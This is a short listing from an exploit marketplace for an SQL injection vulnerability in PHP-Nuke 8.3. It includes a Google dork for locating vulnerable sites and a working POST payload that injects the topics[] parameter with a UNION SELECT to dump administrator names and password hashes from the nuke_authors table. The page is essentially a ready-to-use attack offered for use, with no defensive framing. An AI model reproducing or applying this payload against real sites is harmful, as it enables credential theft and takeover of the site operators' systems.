[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpnuke 8.3 Sql Injection Vulnerability

Author
snip3r_ir
Risk
[
Security Risk High
]
0day-ID
0day-ID-22277
Category
web applications
Date add
25-05-2014
Platform
php
[*] author : ali ahmady -- Iranian security researcher
[*] email : snip3r_ir[at]hotmail.com
[*] greets : b0x , Phantom_X , VIRkid , MOH@MMAD , zeus REKCAH , milad22
[*] google dork : inurl: modules.php?name=Submit_News
[*] at post review level you can inject topic[] parameter.
[*] exploit code : subject=whatever&topics%5B%5D=-1' UNION SELECT 1,group_concat(aid,0x3a,pwd) from nuke_authors--+&alanguage=english&story=whatever
[*] tool : live http header

#  0day.today [2024-11-15]  #